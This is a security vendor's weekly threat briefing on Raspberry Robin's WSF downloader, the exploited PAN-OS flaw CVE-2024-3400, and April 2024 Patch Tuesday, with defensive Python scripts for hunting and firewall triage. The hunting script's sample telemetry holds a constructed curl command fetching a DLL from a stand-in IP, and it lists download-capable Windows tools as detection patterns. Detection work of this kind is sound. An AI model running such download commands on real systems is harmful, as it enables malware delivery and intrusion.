Threat Briefing — Apr 12, 2024

Weekly Threat Briefing - Apr 8 - Apr 12

TLP: CLEAR - This information may be shared publicly

eSentire's Threat Response Unit (TRU) compiles the following weekly intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.

Noteworthy News

Raspberry Robin Spreading Through Windows Script Files

Bottom Line: Raspberry Robin's shift to using Windows Scripting Files highlights the malware's adaptability and the increasing sophistication of threats that organizations face today. This change aims to enhance the malware’s evasion capabilities and increase its infection rate.

Raspberry Robin, a notorious Windows worm first identified in late 2021, has evolved significantly in its infection vectors, spreading mechanisms, and the complexity of its operations. Initially observed targeting technology and manufacturing organizations, it has since evolved into one of the most prevalent threats impacting a wide array of sectors.

Previously, Raspberry Robin spread primarily through infected USB drives and hosted its payloads on compromised QNAP devices. On April 10th, HP Threat Research published a report documenting a shift to distribution via Windows Script Files (WSF). WSF is a legitimate Windows Script Host format executed by wscript.exe or cscript.exe, so the new downloader runs under a signed, trusted Windows binary and looks much like an ordinary administrative script rather than a dropped executable. The script files are heavily obfuscated and contain anti-VM and anti-analysis checks so that the payload is only retrieved on machines the script judges to be genuine victims, which blunts sandbox detonation and signature-based detection.

The WSF downloader layers three kinds of anti-analysis measures: obfuscation, environment checks, and execution guards. The script body is padded with junk characters and misleading control flow to slow manual analysis. Before fetching the payload it profiles the host, checking details such as the OS version, CPU type, and running security processes, and it looks for VM-specific hardware identifiers and system settings. If any check indicates a virtualized or analysis environment, the script terminates without downloading anything, so a sandbox never sees the second stage.
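The behaviour described above gives defenders two cheap telemetry signals: a Windows Script Host binary executing a .wsf from a user-writable location, and that script host then spawning a tool able to download a second stage. The hunting logic below is an added example written for this briefing, not code from eSentire, HP Threat Research, or the malware itself. The event records are constructed to resemble process-creation telemetry (Sysmon Event ID 1 or an EDR equivalent), and the field names pid, ppid, image and cmdline are assumptions rather than any vendor's schema.

```python
"""
Hunt for Raspberry Robin-style WSF loaders in process-creation telemetry.

Added example written for this briefing; it is not code from eSentire,
HP Threat Research, or the malware itself. The event records below are
constructed to resemble process-creation telemetry (Sysmon Event ID 1 or
an EDR equivalent) and the field names (pid, ppid, image, cmdline) are
assumptions rather than any vendor's schema.
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Download-capable LOLBins; the set is illustrative, extend it for your estate.
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}
# User-writable locations a phished or drive-by delivered script typically lands in.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(downloads|appdata\\local\\temp)|programdata|windows\\temp)\\",
    re.I,
)
# A .wsf argument, either quoted (may contain spaces) or bare.
WSF_ARG = re.compile(r'"([a-z]:\\[^"]+?\.wsf)"|([a-z]:\\\S+?\.wsf)', re.I)

SAMPLE_EVENTS = [  # constructed sample telemetry, not captured data
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 4212, "ppid": 4100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\jdoe\Downloads\invoice_43891.wsf"'},
    {"pid": 4300, "ppid": 4212, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s -o C:\Users\jdoe\AppData\Local\Temp\p.dll http://203.0.113.10/c"},
    # Benign: a scheduled inventory script run from a protected path, no children.
    {"pid": 5000, "ppid": 1200, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r'cscript.exe //nologo "C:\Program Files\Corp\Tools\inventory.wsf"'},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious_wsf_chains(events):
    """Return one finding per script-host process that ran a .wsf and tripped a heuristic."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    findings = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        m = WSF_ARG.search(e["cmdline"])
        if not m:
            continue
        script = m.group(1) or m.group(2)
        reasons = []
        if USER_WRITABLE.match(script):
            reasons.append("wsf_in_user_writable_path")
        spawned = sorted(basename(c["image"]) for c in children[e["pid"]]
                         if basename(c["image"]) in DOWNLOADERS)
        if spawned:
            reasons.append("script_host_spawned_downloader:" + ",".join(spawned))
        if reasons:
            findings.append({"pid": e["pid"], "script": script, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_wsf_chains(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, only the wscript.exe process that ran invoice_43891.wsf from the Downloads folder and then spawned curl.exe is reported; the cscript.exe inventory job from a protected path produces nothing. Either heuristic alone is noisy in a real estate, so the two are scored together, and the parent-child join is what separates a user double-clicking a downloaded script from a scheduled administrative job.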

eSentire Threat Intelligence Analysis:

The move from USB devices to heavily obfuscated Windows scripting files shows the continuing effort by the Raspberry Robin operators to evade security defenses. The new delivery method will likely help the malware reach a wider range of victims and, as seen in past campaigns, that means more stolen credentials and more ransomware deployments.

Raspberry Robin's flexibility is highlighted by its ability to download and execute a variety of secondary payloads including SocGholish, Cobalt Strike, IcedID, BumbleBee, and Truebot. Additionally, Raspberry Robin's architecture allows it to act as a precursor to ransomware attacks. By establishing initial access and deploying payloads like Cobalt Strike, attackers can maneuver within the network to identify valuable targets for encryption and ransom demands. This capability effectively transforms the malware into a versatile platform for conducting further malicious activities. eSentire’s Threat Intelligence team has previously published an analysis of Raspberry Robin malware.

According to a report released in February 2024 by Check Point Research, the threat actors behind Raspberry Robin have been exploiting vulnerabilities either before or shortly after public disclosure. The speed at which Raspberry Robin incorporates new exploits is notable: previously the malware used exploits that were up to a year old, whereas it now adopts exploits within weeks of disclosure, as it did with CVE-2023-36802. This rapid turnaround suggests that the operators purchase exploits from developers rather than crafting them in-house, prioritizing speed in order to capitalize on unpatched systems.

Given the evolving nature of Raspberry Robin, organizations are advised to implement a multi-layered security strategy that emphasizes both proactive measures and reactive capabilities. Key strategies include a robust patch management process to ensure all systems are up-to-date, advanced Endpoint Detection and Response (EDR) tools that can detect, analyze, and respond to suspicious activity on endpoints, and employee education about malware risks, particularly social engineering and phishing that could lead to the script being run. Because the new loader executes under Windows Script Host, restricting wscript.exe and cscript.exe (or re-associating .wsf, .js and .vbs files with a harmless handler) for users with no business need for them removes this vector outright, and USB device control still matters for the older propagation path.

Raspberry Robin has emerged as a formidable threat in the cybersecurity landscape, showcasing a high degree of adaptability and sophistication in its methods of spreading and exploiting vulnerabilities. Its evolution indicates that threat actors are continuously enhancing their methods to bypass traditional security measures. This requires organizations to stay vigilant and proactive in updating their cybersecurity defenses against these evolving threats.

Critical Vulnerability in Palo Alto Networks Exploited

Bottom Line: Due to the wide deployment of Palo Alto Networks appliances, vulnerabilities in their products are highly valuable to attackers. As CVE-2024-3400 (CVSS: 10) is already being exploited, it is important for customers using the firewall to apply mitigations and closely follow Palo Alto Networks’ updates regarding fixes to the impacted PAN-OS versions.

On April 12th, Palo Alto Networks released an advisory for a critical, actively exploited vulnerability in the PAN-OS operating system running on its appliances. The vulnerability, tracked as CVE-2024-3400 (CVSS: 10), is a command injection flaw in the GlobalProtect feature of PAN-OS. Successful exploitation allows an unauthenticated remote attacker to execute arbitrary code with root privileges on the firewall. The flaw affects PAN-OS 10.2, 11.0, and 11.1 firewalls that have a GlobalProtect gateway or portal configured; earlier PAN-OS releases, Cloud NGFW, Panorama appliances, and Prisma Access are not affected.

The vulnerability and its real-world exploitation were identified by Volexity, who reported their findings to Palo Alto Networks. According to both companies, exploitation is ongoing and has impacted multiple organizations. Palo Alto Networks’ Unit 42 has released a report with limited details on observed attacks and known Indicators of Compromise (IoCs); the current campaign is being tracked under the name Operation MidnightEclipse. After initial exploitation, threat actors have been observed deploying reverse shells and the UPSTYLE backdoor, as well as executing a variety of commands on the firewall, including copying and exfiltrating configuration files. Volexity tracks the threat actor behind Operation MidnightEclipse as UTA0218.

Palo Alto Networks released security patches to address CVE-2024-3400 on April 14th, 2024. If patching is not immediately possible, it is critical that organizations apply the available mitigations: customers with a Threat Prevention subscription should enable Threat ID 95187 and ensure a Vulnerability Protection profile is applied to the security rules governing the GlobalProtect interface. Firewalls without that subscription cannot use this mitigation and must be patched.
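Identifying which firewalls are actually exposed comes down to three facts per device: the PAN-OS train, whether the installed hotfix is at or past the fixed release, and whether GlobalProtect is configured at all. The script below is an added example for this briefing, not Palo Alto Networks or eSentire tooling. It assumes an inventory export carrying a hostname, the PAN-OS sw-version string, and a GlobalProtect flag (the field names are assumptions). The FIXED table holds the first hotfix releases from the April 2024 advisory as an assumption; the vendor subsequently published hotfixes for earlier maintenance releases as well, so load the current list from the advisory before relying on the verdicts.

```python
"""
Triage a PAN-OS inventory for exposure to CVE-2024-3400.

Added example for this briefing; not Palo Alto Networks or eSentire
tooling. ASSUMPTIONS: the inventory field names (host, sw-version, gp)
and the FIXED table, which lists the first-wave hotfix releases from the
April 2024 advisory. The vendor later added hotfixes for earlier
maintenance releases, so refresh FIXED from the advisory before use.
"""
import re

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")

# ASSUMPTION: first-wave fixed releases, one per affected train.
FIXED = [
    (10, 2, 9, 1),   # 10.2.9-h1
    (11, 0, 4, 1),   # 11.0.4-h1
    (11, 1, 2, 3),   # 11.1.2-h3
]
AFFECTED_TRAINS = {f[:2] for f in FIXED}


def parse_panos(version: str):
    """'11.1.2-h3' -> (11, 1, 2, 3). A release without a hotfix suffix is hotfix 0."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def is_fixed(v) -> bool:
    """Fixed if the device runs the fixed hotfix (or later) of a listed
    maintenance release, or a maintenance release newer than any listed one."""
    same_train = [f for f in FIXED if f[:2] == v[:2]]
    same_maint = [f for f in same_train if f[2] == v[2]]
    if same_maint:
        return v[3] >= same_maint[0][3]
    # Maintenance releases absent from the table are treated as unfixed:
    # fail closed until FIXED is refreshed from the advisory.
    return v[2] > max(f[2] for f in same_train)


def assess(version: str, globalprotect_configured: bool) -> str:
    v = parse_panos(version)
    if v[:2] not in AFFECTED_TRAINS:
        return "not_affected_train"        # e.g. 10.1 and earlier
    if not globalprotect_configured:
        return "no_globalprotect"          # the flaw is in the GlobalProtect feature
    return "patched" if is_fixed(v) else "VULNERABLE"


INVENTORY = [  # constructed sample export, not real devices
    {"host": "fw-edge-01",  "sw-version": "11.1.2-h2", "gp": True},
    {"host": "fw-edge-02",  "sw-version": "11.1.2-h3", "gp": True},
    {"host": "fw-dc-01",    "sw-version": "10.2.8-h1", "gp": False},
    {"host": "fw-lab-01",   "sw-version": "10.1.11",   "gp": True},
    {"host": "fw-branch-7", "sw-version": "10.2.9-h1", "gp": True},
]


def triage(inventory):
    return {d["host"]: assess(d["sw-version"], d["gp"]) for d in inventory}


if __name__ == "__main__":
    for host, verdict in triage(INVENTORY).items():
        print(f"{host:12} {verdict}")
```

The hotfix suffix is parsed as a fourth version component, so 11.1.2-h2 correctly sorts below 11.1.2-h3 while a plain 11.1.3 counts as later than both. A device whose maintenance release is not in the table is reported as vulnerable rather than patched, which is the right default while the advisory is still growing its fixed-version list. A "no_globalprotect" verdict is not a reason to skip the patch; it only means the device is not reachable through the exploited feature today.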

eSentire Threat Intelligence Analysis:

While details on real-world attacks are still limited, it is critical that organizations immediately apply the relevant mitigations, as attacks are ongoing. According to Volexity, exploitation was first observed on March 26th, 2024, but attacks may have begun before that date. All potentially impacted organizations should therefore review their Palo Alto Networks firewalls for signs of compromise and unusual activity, including unexpected configuration exports, unexplained outbound connections from the device, and the indicators published by Volexity and Unit 42.

Vulnerabilities in Internet-facing applications, such as CVE-2024-3400, are high-value for threat actors, as they offer an avenue for initial access into victim organizations. As the vulnerability has only recently been disclosed and technical details are minimal, it is likely that only a single threat actor group is exploiting the vulnerability at this time. The eSentire Threat Intelligence team assesses with high confidence that the disclosure of technical details and Proof-of-Concept (PoC) exploit code, will result in the widespread adoption of the exploit by various threat actor groups.

In response to the disclosure of CVE-2024-3400, eSentire released a security advisory on April 12th. We have also released an updated security advisory on April 16th. Additionally, threat hunts have been performed across the eSentire customer base, and eSentire Managed Vulnerability Service (MVS) has plugins in place to identify vulnerable devices.

Microsoft Patch Tuesday Release

Bottom Line: April 9th marked Microsoft’s monthly Patch Tuesday release. This month, Microsoft highlighted two vulnerabilities that are being actively exploited in the wild. Organizations are strongly recommended to review the full Microsoft release and apply all relevant security patches.

In the April 9th Patch Tuesday release, Microsoft addressed a total of 149 vulnerabilities, including 67 Remote Code Execution (RCE) vulnerabilities. Most notably, the release includes one confirmed zero-day vulnerability, and a second that Microsoft has not marked as exploited but that the researchers who discovered it report is being exploited.

The vulnerability that Microsoft has confirmed as exploited in the wild is CVE-2024-26234 (CVSS: 6.7), a Proxy Driver Spoofing vulnerability. In real-world attacks it was abused to pass a malicious driver carrying a backdoor off as legitimately signed software, lending the malware the trust of a valid Microsoft signature.

CVE-2024-29988 (CVSS: 8.8), a SmartScreen Prompt Security Feature Bypass vulnerability, is disputed: the researchers who reported it state that exploitation is ongoing, while Microsoft classifies it only as “Exploitation More Likely”. In an attack scenario, a threat actor delivers a maliciously crafted file to a victim; opening the file leads to code execution without the SmartScreen warning prompt that would normally appear.

Organizations are strongly recommended to review the full Microsoft Patch Tuesday release for April 2024, and ensure security patches are applied for all impacted systems.

eSentire Threat Intelligence Analysis:

The size of this release underlines the importance of regular vulnerability management and prompt patch deployment, and the difficulty of securing a large software ecosystem against a constantly changing threat landscape. Managed vulnerability services can assist organizations in identifying affected systems and prioritizing which patches to deploy first.

This is by far the largest Patch Tuesday release of the year, addressing 149 vulnerabilities; the previous 2024 maximum was 74 in February. The majority of the Remote Code Execution vulnerabilities in this release are in the Microsoft ODBC and OLE DB drivers for SQL Server, indicating that they likely share a common flaw, although Microsoft has not shared technical details to confirm this. Exploiting these driver flaws requires an authenticated user to be lured into connecting to an attacker-controlled SQL server, so they are less urgent than the two exploited issues above but should still be patched on systems running client applications that connect to untrusted databases.

The eSentire Threat Intelligence team continues to track the recently disclosed vulnerabilities for additional details and detection opportunities. Threat hunts have been performed for exploitation of CVE-2024-26234, based on Indicators of Compromise (IoCs) shared by Sophos.

About the threat briefings:

The threat briefing is a weekly intelligence overview for non-technical users. The Threat Intelligence team at eSentire investigates, analyzes, and organizes the most important events of the past week along with important security tips and redistributes the findings for quick reading. The main goal of this briefing is to improve the overall awareness of readers regarding cyber security.

eSentire Threat Response Unit (TRU)

Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is organized into cross-functional groups to protect you against advanced and emerging threats, giving your organization access to leading threat intelligence and cybersecurity expertise.
